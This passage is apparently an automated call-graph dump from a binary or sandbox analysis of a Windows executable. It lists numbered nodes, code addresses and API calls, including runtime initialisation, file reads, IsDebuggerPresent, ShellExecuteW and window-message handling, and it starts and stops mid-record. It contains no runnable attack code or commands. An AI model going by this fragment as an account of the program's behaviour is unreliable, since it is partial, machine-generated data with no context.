86458->86483 86485 417f77 46 API calls __getptd_noexit 86460->86485 86461 4139ed 86484 417f25 10 API calls __controlfp_s 86461->86484 86464->86457 86471 41388a 86464->86471 86478 419e30 46 API calls __controlfp_s 86464->86478 86466 41396c 86466->86457 86468 413967 86466->86468 86469 41397a 86466->86469 86467 413929 86467->86457 86470 413945 86467->86470 86480 419e30 46 API calls __controlfp_s 86467->86480 86468->86418 86482 419e30 46 API calls __controlfp_s 86469->86482 86470->86457 86470->86468 86474 41395b 86470->86474 86471->86457 86477 413909 86471->86477 86479 419e30 46 API calls __controlfp_s 86471->86479 86481 419e30 46 API calls __controlfp_s 86474->86481 86477->86466 86477->86467 86478->86471 86479->86477 86480->86470 86481->86468 86482->86468 86483->86461 86484->86468 86485->86468 86487 419f13 86486->86487 86488 419f0e 86486->86488 86495 417f77 46 API calls __getptd_noexit 86487->86495 86488->86487 86491 419f2b 86488->86491 86493 40e454 86491->86493 86497 417f77 46 API calls __getptd_noexit 86491->86497 86493->86421 86494 419f18 86496 417f25 10 API calls __controlfp_s 86494->86496 86495->86494 86496->86493 86497->86494 86499 403367 86498->86499 86500 403358 86498->86500 86501 4115d7 52 API calls 86499->86501 86500->86444 86502 403370 86501->86502 86503 4115d7 52 API calls 86502->86503 86504 40339e 86503->86504 86504->86444 86505->86452 86506 416454 86543 416c70 86506->86543 86508 416460 GetStartupInfoW 86509 416474 86508->86509 86544 419d5a HeapCreate 86509->86544 86511 4164cd 86512 4164d8 86511->86512 86627 41642b 46 API calls 3 library calls 86511->86627 86545 417c20 GetModuleHandleW 86512->86545 86515 4164de 86516 4164e9 __RTC_Initialize 86515->86516 86628 41642b 46 API calls 3 library calls 86515->86628 86564 41aaa1 GetStartupInfoW 86516->86564 86519 416503 GetCommandLineW 86577 41f584 GetEnvironmentStringsW 86519->86577 86523 416513 86583 41f4d6 GetModuleFileNameW 86523->86583 86526 41651d 86527 416528 86526->86527 86630 411924 46 API calls 3 library calls 86526->86630 86587 41f2a4 86527->86587 86530 41652e 86531 416539 86530->86531 86631 411924 46 API calls 3 library calls 86530->86631 86601 411703 86531->86601 86534 416541 86536 41654c __wwincmdln 86534->86536 86632 411924 46 API calls 3 library calls 86534->86632 86605 40d6b0 86536->86605 86539 41657c 86634 411906 46 API calls _doexit 86539->86634 86542 416581 type_info::_Type_info_dtor 86543->86508 86544->86511 86546 417c34 86545->86546 86547 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86545->86547 86635 4178ff 49 API calls _free 86546->86635 86549 417c87 TlsAlloc 86547->86549 86552 417cd5 TlsSetValue 86549->86552 86553 417d96 86549->86553 86550 417c39 86550->86515 86552->86553 86554 417ce6 __init_pointers 86552->86554 86553->86515 86636 418151 InitializeCriticalSectionAndSpinCount 86554->86636 86556 417d91 86644 4178ff 49 API calls _free 86556->86644 86558 417d2a 86558->86556 86637 416b49 86558->86637 86561 417d76 86643 41793c 46 API calls 4 library calls 86561->86643 86563 417d7e GetCurrentThreadId 86563->86553 86565 416b49 __calloc_crt 46 API calls 86564->86565 86566 41aabf 86565->86566 86567 41ac34 86566->86567 86569 416b49 __calloc_crt 46 API calls 86566->86569 86571 4164f7 86566->86571 86573 41abb4 86566->86573 86568 41ac6a GetStdHandle 86567->86568 86570 41acce SetHandleCount 86567->86570 86572 41ac7c GetFileType 86567->86572 86576 41aca2 InitializeCriticalSectionAndSpinCount 86567->86576 86568->86567 86569->86566 86570->86571 86571->86519 86629 411924 46 API calls 3 library calls 86571->86629 86572->86567 86573->86567 86574 41abe0 GetFileType 86573->86574 86575 41abeb InitializeCriticalSectionAndSpinCount 86573->86575 86574->86573 86574->86575 86575->86571 86575->86573 86576->86567 86576->86571 86578 41f595 86577->86578 86579 41f599 86577->86579 86578->86523 86654 416b04 86579->86654 86581 41f5bb _memmove 86582 41f5c2 FreeEnvironmentStringsW 86581->86582 86582->86523 86584 41f50b _wparse_cmdline 86583->86584 86585 416b04 __malloc_crt 46 API calls 86584->86585 86586 41f54e _wparse_cmdline 86584->86586 86585->86586 86586->86526 86588 41f2bc _wcslen 86587->86588 86592 41f2b4 86587->86592 86589 416b49 __calloc_crt 46 API calls 86588->86589 86594 41f2e0 _wcslen 86589->86594 86590 41f336 86661 413748 86590->86661 86592->86530 86593 416b49 __calloc_crt 46 API calls 86593->86594 86594->86590 86594->86592 86594->86593 86595 41f35c 86594->86595 86598 41f373 86594->86598 86660 41ef12 46 API calls __controlfp_s 86594->86660 86596 413748 _free 46 API calls 86595->86596 86596->86592 86667 417ed3 86598->86667 86600 41f37f 86600->86530 86602 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86601->86602 86604 411750 __IsNonwritableInCurrentImage 86602->86604 86686 41130a 51 API calls __cinit 86602->86686 86604->86534 86606 42e2f3 86605->86606 86607 40d6cc 86605->86607 86687 408f40 86607->86687 86609 40d707 86691 40ebb0 86609->86691 86612 40d737 86694 411951 86612->86694 86617 40d751 86706 40f4e0 SystemParametersInfoW SystemParametersInfoW 86617->86706 86619 40d75f 86707 40d590 GetCurrentDirectoryW 86619->86707 86621 40d767 SystemParametersInfoW 86622 40d78d 86621->86622 86623 408f40 VariantClear 86622->86623 86624 40d79d 86623->86624 86625 408f40 VariantClear 86624->86625 86626 40d7a6 86625->86626 86626->86539 86633 4118da 46 API calls _doexit 86626->86633 86627->86512 86628->86516 86633->86539 86634->86542 86635->86550 86636->86558 86638 416b52 86637->86638 86640 416b8f 86638->86640 86641 416b70 Sleep 86638->86641 86645 41f677 86638->86645 86640->86556 86640->86561 86642 416b85 86641->86642 86642->86638 86642->86640 86643->86563 86644->86553 86646 41f683 86645->86646 86651 41f69e _malloc 86645->86651 86647 41f68f 86646->86647 86646->86651 86653 417f77 46 API calls __getptd_noexit 86647->86653 86648 41f6b1 HeapAlloc 86650 41f6d8 86648->86650 86648->86651 86650->86638 86651->86648 86651->86650 86652 41f694 86652->86638 86653->86652 86656 416b0d 86654->86656 86655 4135bb _malloc 45 API calls 86655->86656 86656->86655 86657 416b43 86656->86657 86658 416b24 Sleep 86656->86658 86657->86581 86659 416b39 86658->86659 86659->86656 86659->86657 86660->86594 86662 41377c _free 86661->86662 86663 413753 RtlFreeHeap 86661->86663 86662->86592 86663->86662 86664 413768 86663->86664 86670 417f77 46 API calls __getptd_noexit 86664->86670 86666 41376e GetLastError 86666->86662 86671 417daa 86667->86671 86670->86666 86672 417dc9 __localtime64_s __call_reportfault 86671->86672 86673 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86672->86673 86675 417eb5 __call_reportfault 86673->86675 86677 41a208 86675->86677 86676 417ed1 GetCurrentProcess TerminateProcess 86676->86600 86678 41a210 86677->86678 86679 41a212 IsDebuggerPresent 86677->86679 86678->86676 86685 41fe19 86679->86685 86682 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86683 421ff0 __call_reportfault 86682->86683 86684 421ff8 GetCurrentProcess TerminateProcess 86682->86684 86683->86684 86684->86676 86685->86682 86686->86604 86689 408f48 moneypunct 86687->86689 86688 4265c7 VariantClear 86690 408f55 moneypunct 86688->86690 86689->86688 86689->86690 86690->86609 86747 40ebd0 86691->86747 86751 4182cb 86694->86751 86696 41195e 86758 4181f2 LeaveCriticalSection 86696->86758 86698 40d748 86699 4119b0 86698->86699 86700 4119d6 86699->86700 86701 4119bc 86699->86701 86700->86617 86701->86700 86793 417f77 46 API calls __getptd_noexit 86701->86793 86703 4119c6 86794 417f25 10 API calls __controlfp_s 86703->86794 86705 4119d1 86705->86617 86706->86619 86795 401f20 86707->86795 86709 40d5b6 IsDebuggerPresent 86710 40d5c4 86709->86710 86711 42e1bb MessageBoxA 86709->86711 86712 42e1d4 86710->86712 86713 40d5e3 86710->86713 86711->86712 86967 403a50 52 API calls 3 library calls 86712->86967 86865 40f520 86713->86865 86717 40d5fd GetFullPathNameW 86877 401460 86717->86877 86719 40d63b 86720 40d643 86719->86720 86722 42e231 SetCurrentDirectoryW 86719->86722 86721 40d64c 86720->86721 86968 432fee 6 API calls 86720->86968 86892 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86721->86892 86722->86720 86726 42e252 86726->86721 86727 42e25a GetModuleFileNameW 86726->86727 86729 42e274 86727->86729 86730 42e2cb GetForegroundWindow ShellExecuteW 86727->86730 86969 401b10 86729->86969 86737 40d688 86730->86737 86731 40d656 86733 40d669 86731->86733 86735 40e0c0 74 API calls 86731->86735 86900 4091e0 86733->86900 86735->86733 86740 40d692 SetCurrentDirectoryW 86737->86740 86740->86621 86741 42e28d 86976 40d200 52 API calls 2 library calls 86741->86976 86744 42e299 GetForegroundWindow ShellExecuteW 86745 42e2c6 86744->86745 86745->86737 86746 40ec00 LoadLibraryA GetProcAddress 86746->86612 86748 40d72e 86747->86748 86749 40ebd6 LoadLibraryA 86747->86749 86748->86612 86748->86746 86749->86748 86750 40ebe7 GetProcAddress 86749->86750 86750->86748 86752 4182e0 86751->86752 86753 4182f3 EnterCriticalSection 86751->86753 86759 418209 86752->86759 86753->86696 86755 4182e6 86755->86753 86786 411924 46 API calls 3 library calls 86755->86786 86758->86698 86760 418215 type_info::_Type_info_dtor 86759->86760 86761 418225 86760->86761 86762 41823d 86760->86762 86787 418901 46 API calls 2 library calls 86761->86787 86764 416b04 __malloc_crt 45 API calls 86762->86764 86770 41824b type_info::_Type_info_dtor 86762->86770 86766 418256 86764->86766 86765 41822a 86788 418752 46 API calls 7 library calls 86765->86788 86768 41825d 86766->86768 86769 41826c 86766->86769 86790 417f77 46 API calls __getptd_noexit 86768->86790 86773 4182cb __lock 45 API calls 86769->86773 86770->86755 86771 418231 86789 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86771->86789 86775 418273 86773->86775 86777 4182a6 86775->86777 86778 41827b InitializeCriticalSectionAndSpinCount 86775->86778 86779 413748 _free 45 API calls 86777->86779 86780 418297 86778->86780 86781 41828b 86778->86781 86779->86780 86792 4182c2 LeaveCriticalSection _doexit 86780->86792 86782 413748 _free 45 API calls 86781->86782 86784 418291 86782->86784 86791 417f77 46 API calls __getptd_noexit 86784->86791 86787->86765 86788->86771 86790->86770 86791->86780 86792->86770 86793->86703 86794->86705 86977 40e6e0 86795->86977 86799 401f41 GetModuleFileNameW 86995 410100 86799->86995 86801 401f5c 87007 410960 86801->87007 86804 401b10 52 API calls 86805 401f81 86804->86805 87010 401980 86805->87010 86807 401f8e 86808 408f40 VariantClear 86807->86808 86809 401f9d 86808->86809 86810 401b10 52 API calls 86809->86810 86811 401fb4 86810->86811 86812 401980 53 API calls 86811->86812 86813 401fc3 86812->86813 86814 401b10 52 API calls 86813->86814 86815 401fd2 86814->86815 87018 40c2c0 86815->87018 86817 401fe1 86818 40bc70 52 API calls 86817->86818 86819 401ff3 86818->86819 87036 401a10 86819->87036 86821 401ffe 87043 4114ab 86821->87043 86824 428b05 86826 401a10 52 API calls 86824->86826 86825 402017 86827 4114ab __wcsicoll 58 API calls 86825->86827 86828 428b18 86826->86828 86829 402022 86827->86829 86831 401a10 52 API calls 86828->86831 86829->86828 86830 40202d 86829->86830 86832 4114ab __wcsicoll 58 API calls 86830->86832 86833 428b33 86831->86833 86834 402038 86832->86834 86836 428b3b GetModuleFileNameW 86833->86836 86835 402043 86834->86835 86834->86836 86837 4114ab __wcsicoll 58 API calls 86835->86837 86838 401a10 52 API calls 86836->86838 86839 40204e 86837->86839 86840 428b6c 86838->86840 86841 402092 86839->86841 86845 401a10 52 API calls 86839->86845 86850 428b90 _wcscpy 86839->86850 86842 40e0a0 52 API calls 86840->86842 86844 4020a3 86841->86844 86841->86850 86843 428b7a 86842->86843 86846 401a10 52 API calls 86843->86846 86847 428bc6 86844->86847 87051 40e830 86844->87051 86848 402073 _wcscpy 86845->86848 86849 428b88 86846->86849 86856 401a10 52 API calls 86848->86856 86849->86850 86853 401a10 52 API calls 86850->86853 86860 4020d0 86853->86860 86855 4020c6 86857 408f40 VariantClear 86855->86857 86856->86841 86857->86860 86858 402110 86862 408f40 VariantClear 86858->86862 86860->86858 86864 401a10 52 API calls 86860->86864 87065 40cf00 53 API calls 86860->87065 87066 40e6a0 53 API calls 86860->87066 86863 402120 moneypunct 86862->86863 86863->86709 86864->86860 86866 4295c9 __localtime64_s 86865->86866 86867 40f53c 86865->86867 86869 4295d9 GetOpenFileNameW 86866->86869 87753 410120 86867->87753 86869->86867 86872 40d5f5 86869->86872 86870 40f545 87757 4102b0 SHGetMalloc 86870->87757 86872->86717 86872->86719 86873 40f54c 87762 410190 GetFullPathNameW 86873->87762 86875 40f559 87773 40f570 86875->87773 87830 402400 86877->87830 86879 40146f 86882 428c29 _wcscat 86879->86882 87839 401500 86879->87839 86881 40147c 86881->86882 87847 40d440 86881->87847 86884 401489 86884->86882 86885 401491 GetFullPathNameW 86884->86885 86886 402160 52 API calls 86885->86886 86887 4014bb 86886->86887 86888 402160 52 API calls 86887->86888 86889 4014c8 86888->86889 86889->86882 86890 402160 52 API calls 86889->86890 86891 4014ee 86890->86891 86891->86719 86893 428361 86892->86893 86894 4103fc LoadImageW RegisterClassExW 86892->86894 87868 44395e EnumResourceNamesW LoadImageW 86893->87868 87867 410490 7 API calls 86894->87867 86897 40d651 86899 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86897->86899 86898 428368 86899->86731 86901 409202 86900->86901 86902 42d7ad 86900->86902 86960 409216 moneypunct 86901->86960 88140 410940 328 API calls 86901->88140 88143 45e737 90 API calls 3 library calls 86902->88143 86905 409386 86906 40939c 86905->86906 88141 40f190 10 API calls 86905->88141 86906->86737 86966 401000 Shell_NotifyIconW __localtime64_s 86906->86966 86908 4095b2 86908->86906 86910 4095bf 86908->86910 86909 409253 PeekMessageW 86909->86960 88142 401a50 328 API calls 86910->88142 86912 42d8cd Sleep 86912->86960 86913 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86913->86906 86916 4095f9 86913->86916 86915 42e13b 88161 40d410 VariantClear 86915->88161 86919 42e158 TranslateMessage DispatchMessageW GetMessageW 86916->86919 86919->86919 86920 42e188 86919->86920 86920->86906 86922 409567 PeekMessageW 86922->86960 86924 44c29d 52 API calls 86965 4094e0 86924->86965 86925 46f3c1 107 API calls 86925->86960 86926 40e0a0 52 API calls 86926->86960 86927 46fdbf 108 API calls 86927->86965 86928 409551 TranslateMessage DispatchMessageW 86928->86922 86930 42dcd2 WaitForSingleObject 86932 42dcf0 GetExitCodeProcess CloseHandle 86930->86932 86930->86960 86931 42dd3d Sleep 86931->86965 88150 40d410 VariantClear 86932->88150 86936 4094cf Sleep 86936->86965 86937 40c620 timeGetTime 86937->86965 86938 40d410 VariantClear 86938->86960 86940 42d94d timeGetTime 88146 465124 53 API calls 86940->88146 86944 42dd89 CloseHandle 86944->86965 86945 47d33e 306 API calls 86945->86960 86946 408f40 VariantClear 86946->86965 86948 465124 53 API calls 86948->86965 86949 42de19 GetExitCodeProcess CloseHandle 86949->86965 86951 401b10 52 API calls 86951->86965 86953 42de88 Sleep 86953->86960 86956 401980 53 API calls 86956->86965 86957 45e737 90 API calls 86957->86960 86960->86905 86960->86909 86960->86912 86960->86915 86960->86922 86960->86925 86960->86926 86960->86928 86960->86930 86960->86931 86960->86936 86960->86938 86960->86940 86960->86945 86960->86957 86961 42e0cc VariantClear 86960->86961 86962 408f40 VariantClear 86960->86962 86960->86965 87869 4091b0 86960->87869 87927 40afa0 86960->87927 87953 408fc0 86960->87953 87988 408cc0 86960->87988 88002 40d150 86960->88002 88007 40d170 86960->88007 88013 4096a0 86960->88013 88144 465124 53 API calls 86960->88144 88145 40c620 timeGetTime 86960->88145 88160 40e270 VariantClear moneypunct 86960->88160 86961->86960 86962->86960 86965->86924 86965->86927 86965->86937 86965->86944 86965->86946 86965->86948 86965->86949 86965->86951 86965->86953 86965->86956 86965->86960 88147 45178a 54 API calls 86965->88147 88148 47d33e 328 API calls 86965->88148 88149 453bc6 54 API calls 86965->88149 88151 40d410 VariantClear 86965->88151 88152 443d19 67 API calls _wcslen 86965->88152 88153 4574b4 VariantClear 86965->88153 88154 403cd0 86965->88154 88158 4731e1 VariantClear 86965->88158 88159 4331a2 6 API calls 86965->88159 86966->86737 86967->86719 86968->86726 86970 401b16 _wcslen 86969->86970 86971 4115d7 52 API calls 86970->86971 86974 401b63 86970->86974 86972 401b4b _memmove 86971->86972 86973 4115d7 52 API calls 86972->86973 86973->86974 86975 40d200 52 API calls 2 library calls 86974->86975 86975->86741 86976->86744 86978 40bc70 52 API calls 86977->86978 86979 401f31 86978->86979 86980 402560 86979->86980 86981 40256d __write_nolock 86980->86981 86982 402160 52 API calls 86981->86982 86984 402593 86982->86984 86991 4025bd 86984->86991 87067 401c90 86984->87067 86985 4026f0 52 API calls 86985->86991 86986 4026a7 86987 401b10 52 API calls 86986->86987 86994 4026db 86986->86994 86989 4026d1 86987->86989 86988 401b10 52 API calls 86988->86991 87071 40d7c0 52 API calls 2 library calls 86989->87071 86990 401c90 52 API calls 86990->86991 86991->86985 86991->86986 86991->86988 86991->86990 87070 40d7c0 52 API calls 2 library calls 86991->87070 86994->86799 87072 40f760 86995->87072 86998 410118 86998->86801 87000 42805d 87001 42806a 87000->87001 87128 431e58 87000->87128 87003 413748 _free 46 API calls 87001->87003 87004 428078 87003->87004 87005 431e58 82 API calls 87004->87005 87006 428084 87005->87006 87006->86801 87008 4115d7 52 API calls 87007->87008 87009 401f74 87008->87009 87009->86804 87011 4019a3 87010->87011 87016 401985 87010->87016 87012 4019b8 87011->87012 87011->87016 87735 403e10 53 API calls 87012->87735 87014 40199f 87014->86807 87015 4019c4 87015->86807 87016->87014 87734 403e10 53 API calls 87016->87734 87019 40c2c7 87018->87019 87020 40c30e 87018->87020 87023 40c2d3 87019->87023 87024 426c79 87019->87024 87021 40c315 87020->87021 87022 426c2b 87020->87022 87025 40c321 87021->87025 87026 426c5a 87021->87026 87028 426c4b 87022->87028 87029 426c2e 87022->87029 87736 403ea0 52 API calls __cinit 87023->87736 87741 4534e3 52 API calls 87024->87741 87737 403ea0 52 API calls __cinit 87025->87737 87740 4534e3 52 API calls 87026->87740 87739 4534e3 52 API calls 87028->87739 87034 40c2de 87029->87034 87738 4534e3 52 API calls 87029->87738 87034->86817 87037 401a30 87036->87037 87038 401a17 87036->87038 87040 402160 52 API calls 87037->87040 87039 401a2d 87038->87039 87742 403c30 52 API calls _memmove 87038->87742 87039->86821 87042 401a3d 87040->87042 87042->86821 87044 411523 87043->87044 87045 4114ba 87043->87045 87745 4113a8 58 API calls 3 library calls 87044->87745 87048 40200c 87045->87048 87743 417f77 46 API calls __getptd_noexit 87045->87743 87048->86824 87048->86825 87049 4114c6 87744 417f25 10 API calls __controlfp_s 87049->87744 87052 427c86 87051->87052 87053 40e84a 87051->87053 87752 40e1f0 VariantClear moneypunct 87052->87752 87746 40e950 87053->87746 87056 427c8b 87059 40e950 53 API calls 87056->87059 87058 40e85c 87060 4115d7 52 API calls 87058->87060 87063 4020bb 87058->87063 87059->87063 87061 40e8fc 87060->87061 87062 4115d7 52 API calls 87061->87062 87062->87063 87064 40cf00 53 API calls 87063->87064 87064->86855 87065->86860 87066->86860 87068 4026f0 52 API calls 87067->87068 87069 401c97 87068->87069 87069->86984 87070->86991 87071->86994 87132 40f6f0 87072->87132 87074 40f77b _strcat moneypunct 87140 40f850 87074->87140 87079 427c2a 87170 414d04 87079->87170 87081 40f7fc 87081->87079 87082 40f804 87081->87082 87157 414a46 87082->87157 87087 40f80e 87087->86998 87091 4528bd 87087->87091 87088 427c59 87176 414fe2 87088->87176 87090 427c79 87092 4150d1 _fseek 81 API calls 87091->87092 87093 452930 87092->87093 87676 452719 87093->87676 87096 452948 87096->87000 87097 414d04 __fread_nolock 61 API calls 87098 452966 87097->87098 87099 414d04 __fread_nolock 61 API calls 87098->87099 87100 452976 87099->87100 87101 414d04 __fread_nolock 61 API calls 87100->87101 87102 45298f 87101->87102 87103 414d04 __fread_nolock 61 API calls 87102->87103 87104 4529aa 87103->87104 87105 4150d1 _fseek 81 API calls 87104->87105 87106 4529c4 87105->87106 87107 4135bb _malloc 46 API calls 87106->87107 87108 4529cf 87107->87108 87109 4135bb _malloc 46 API calls 87108->87109 87110 4529db 87109->87110 87111 414d04 __fread_nolock 61 API calls 87110->87111 87112 4529ec 87111->87112 87113 44afef GetSystemTimeAsFileTime 87112->87113 87114 452a00 87113->87114 87115 452a36 87114->87115 87116 452a13 87114->87116 87118 452aa5 87115->87118 87119 452a3c 87115->87119 87117 413748 _free 46 API calls 87116->87117 87121 452a1c 87117->87121 87120 413748 _free 46 API calls 87118->87120 87682 44b1a9 87119->87682 87123 452aa3 87120->87123 87124 413748 _free 46 API calls 87121->87124 87123->87000 87127 452a25 87124->87127 87125 452a9d 87126 413748 _free 46 API calls 87125->87126 87126->87123 87127->87000 87129 431e64 87128->87129 87131 431e6a 87128->87131 87130 414a46 __fcloseall 82 API calls 87129->87130 87130->87131 87131->87001 87133 425de2 87132->87133 87134 40f6fc _wcslen 87132->87134 87133->87074 87135 40f710 WideCharToMultiByte 87134->87135 87136 40f756 87135->87136 87137 40f728 87135->87137 87136->87074 87138 4115d7 52 API calls 87137->87138 87139 40f735 WideCharToMultiByte 87138->87139 87139->87074 87142 40f85d __localtime64_s _strlen 87140->87142 87141 426b3b 87142->87141 87144 40f7ab 87142->87144 87189 414db8 87142->87189 87145 4149c2 87144->87145 87204 414904 87145->87204 87147 40f7e9 87147->87079 87148 40f5c0 87147->87148 87153 40f5cd _strcat __write_nolock _memmove 87148->87153 87149 414d04 __fread_nolock 61 API calls 87149->87153 87151 425d11 87152 4150d1 _fseek 81 API calls 87151->87152 87154 425d33 87152->87154 87153->87149 87153->87151 87156 40f691 __tzset_nolock 87153->87156 87292 4150d1 87153->87292 87155 414d04 __fread_nolock 61 API calls 87154->87155 87155->87156 87156->87081 87158 414a52 type_info::_Type_info_dtor 87157->87158 87159 414a64 87158->87159 87160 414a79 87158->87160 87432 417f77 46 API calls __getptd_noexit 87159->87432 87162 415471 __lock_file 47 API calls 87160->87162 87166 414a74 type_info::_Type_info_dtor 87160->87166 87164 414a92 87162->87164 87163 414a69 87433 417f25 10 API calls __controlfp_s 87163->87433 87416 4149d9 87164->87416 87166->87087 87501 414c76 87170->87501 87172 414d1c 87173 44afef 87172->87173 87669 442c5a 87173->87669 87175 44b00d 87175->87088 87177 414fee type_info::_Type_info_dtor 87176->87177 87178 414ffa 87177->87178 87179 41500f 87177->87179 87673 417f77 46 API calls __getptd_noexit 87178->87673 87181 415471 __lock_file 47 API calls 87179->87181 87183 415017 87181->87183 87182 414fff 87674 417f25 10 API calls __controlfp_s 87182->87674 87185 414e4e __ftell_nolock 51 API calls 87183->87185 87186 415024 87185->87186 87675 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87186->87675 87188 41500a type_info::_Type_info_dtor 87188->87090 87190 414dd6 87189->87190 87191 414deb 87189->87191 87200 417f77 46 API calls __getptd_noexit 87190->87200 87191->87190 87193 414df2 87191->87193 87202 41b91b 79 API calls 11 library calls 87193->87202 87194 414ddb 87201 417f25 10 API calls __controlfp_s 87194->87201 87197 414e18 87198 414de6 87197->87198 87203 418f98 77 API calls 7 library calls 87197->87203 87198->87142 87200->87194 87201->87198 87202->87197 87203->87198 87206 414910 type_info::_Type_info_dtor 87204->87206 87205 414923 87260 417f77 46 API calls __getptd_noexit 87205->87260 87206->87205 87208 414951 87206->87208 87223 41d4d1 87208->87223 87209 414928 87261 417f25 10 API calls __controlfp_s 87209->87261 87212 414956 87213 41496a 87212->87213 87214 41495d 87212->87214 87216 414992 87213->87216 87217 414972 87213->87217 87262 417f77 46 API calls __getptd_noexit 87214->87262 87240 41d218 87216->87240 87263 417f77 46 API calls __getptd_noexit 87217->87263 87218 414933 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 87218->87147 87224 41d4dd type_info::_Type_info_dtor 87223->87224 87225 4182cb __lock 46 API calls 87224->87225 87238 41d4eb 87225->87238 87226 41d560 87265 41d5fb 87226->87265 87227 41d567 87228 416b04 __malloc_crt 46 API calls 87227->87228 87230 41d56e 87228->87230 87230->87226 87232 41d57c InitializeCriticalSectionAndSpinCount 87230->87232 87231 41d5f0 type_info::_Type_info_dtor 87231->87212 87233 41d59c 87232->87233 87234 41d5af EnterCriticalSection 87232->87234 87237 413748 _free 46 API calls 87233->87237 87234->87226 87235 418209 __mtinitlocknum 46 API calls 87235->87238 87237->87226 87238->87226 87238->87227 87238->87235 87268 4154b2 47 API calls __lock 87238->87268 87269 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87238->87269 87241 41d23a 87240->87241 87242 41d255 87241->87242 87254 41d26c __wopenfile 87241->87254 87274 417f77 46 API calls __getptd_noexit 87242->87274 87244 41d421 87246 41d47a 87244->87246 87247 41d48c 87244->87247 87245 41d25a 87275 417f25 10 API calls __controlfp_s 87245->87275 87279 417f77 46 API calls __getptd_noexit 87246->87279 87271 422bf9 87247->87271 87251 41d47f 87280 417f25 10 API calls __controlfp_s 87251->87280 87252 41499d 87264 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87252->87264 87254->87244 87254->87246 87276 41341f 58 API calls 2 library calls 87254->87276 87256 41d41a 87256->87244 87277 41341f 58 API calls 2 library calls 87256->87277 87258 41d439 87258->87244 87278 41341f 58 API calls 2 library calls 87258->87278 87260->87209 87261->87218 87262->87218 87263->87218 87264->87218 87270 4181f2 LeaveCriticalSection 87265->87270 87267 41d602 87267->87231 87268->87238 87269->87238 87270->87267 87281 422b35 87271->87281 87273 422c14 87273->87252 87274->87245 87275->87252 87276->87256 87277->87258 87278->87244 87279->87251 87280->87252 87284 422b41 type_info::_Type_info_dtor 87281->87284 87282 422b54 87283 417f77 __controlfp_s 46 API calls 87282->87283 87285 422b59 87283->87285 87284->87282 87286 422b8a 87284->87286 87287 417f25 __controlfp_s 10 API calls 87285->87287 87288 422400 __tsopen_nolock 109 API calls 87286->87288 87290 422b63 type_info::_Type_info_dtor 87287->87290 87289 422ba4 87288->87289 87291 422bcb __wsopen_helper LeaveCriticalSection 87289->87291 87290->87273 87291->87290 87295 4150dd type_info::_Type_info_dtor 87292->87295 87293 4150e9 87323 417f77 46 API calls __getptd_noexit 87293->87323 87295->87293 87296 41510f 87295->87296 87305 415471 87296->87305 87297 4150ee 87324 417f25 10 API calls __controlfp_s 87297->87324 87304 4150f9 type_info::_Type_info_dtor 87304->87153 87306 415483 87305->87306 87307 4154a5 EnterCriticalSection 87305->87307 87306->87307 87309 41548b 87306->87309 87308 415117 87307->87308 87311 415047 87308->87311 87310 4182cb __lock 46 API calls 87309->87310 87310->87308 87312 415067 87311->87312 87313 415057 87311->87313 87315 415079 87312->87315 87326 414e4e 87312->87326 87381 417f77 46 API calls __getptd_noexit 87313->87381 87343 41443c 87315->87343 87316 41505c 87325 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87316->87325 87321 4150b9 87356 41e1f4 87321->87356 87323->87297 87324->87304 87325->87304 87327 414e61 87326->87327 87328 414e79 87326->87328 87382 417f77 46 API calls __getptd_noexit 87327->87382 87329 414139 __filbuf 46 API calls 87328->87329 87331 414e80 87329->87331 87334 41e1f4 __write 51 API calls 87331->87334 87332 414e66 87383 417f25 10 API calls __controlfp_s 87332->87383 87335 414e97 87334->87335 87336 414f09 87335->87336 87338 414ec9 87335->87338 87342 414e71 87335->87342 87384 417f77 46 API calls __getptd_noexit 87336->87384 87339 41e1f4 __write 51 API calls 87338->87339 87338->87342 87340 414f64 87339->87340 87341 41e1f4 __write 51 API calls 87340->87341 87340->87342 87341->87342 87342->87315 87344 414477 87343->87344 87345 414455 87343->87345 87349 414139 87344->87349 87345->87344 87346 414139 __filbuf 46 API calls 87345->87346 87347 414470 87346->87347 87385 41b7b2 77 API calls 6 library calls 87347->87385 87350 414145 87349->87350 87351 41415a 87349->87351 87386 417f77 46 API calls __getptd_noexit 87350->87386 87351->87321 87353 41414a 87387 417f25 10 API calls __controlfp_s 87353->87387 87355 414155 87355->87321 87357 41e200 type_info::_Type_info_dtor 87356->87357 87358 41e223 87357->87358 87359 41e208 87357->87359 87360 41e22f 87358->87360 87366 41e269 87358->87366 87408 417f8a 46 API calls __getptd_noexit 87359->87408 87410 417f8a 46 API calls __getptd_noexit 87360->87410 87363 41e20d 87409 417f77 46 API calls __getptd_noexit 87363->87409 87365 41e234 87411 417f77 46 API calls __getptd_noexit 87365->87411 87388 41ae56 87366->87388 87369 41e23c 87412 417f25 10 API calls __controlfp_s 87369->87412 87370 41e26f 87371 41e291 87370->87371 87372 41e27d 87370->87372 87413 417f77 46 API calls __getptd_noexit 87371->87413 87398 41e17f 87372->87398 87373 41e215 type_info::_Type_info_dtor 87373->87316 87377 41e289 87415 41e2c0 LeaveCriticalSection __unlock_fhandle 87377->87415 87378 41e296 87414 417f8a 46 API calls __getptd_noexit 87378->87414 87381->87316 87382->87332 87383->87342 87384->87342 87385->87344 87386->87353 87387->87355 87389 41ae62 type_info::_Type_info_dtor 87388->87389 87390 41aebc 87389->87390 87391 4182cb __lock 46 API calls 87389->87391 87392 41aec1 EnterCriticalSection 87390->87392 87393 41aede type_info::_Type_info_dtor 87390->87393 87394 41ae8e 87391->87394 87392->87393 87393->87370 87395 41aeaa 87394->87395 87396 41ae97 InitializeCriticalSectionAndSpinCount 87394->87396 87397 41aeec ___lock_fhandle LeaveCriticalSection 87395->87397 87396->87395 87397->87390 87399 41aded __chsize_nolock 46 API calls 87398->87399 87400 41e18e 87399->87400 87401 41e1a4 SetFilePointer 87400->87401 87402 41e194 87400->87402 87403 41e1c3 87401->87403 87404 41e1bb GetLastError 87401->87404 87405 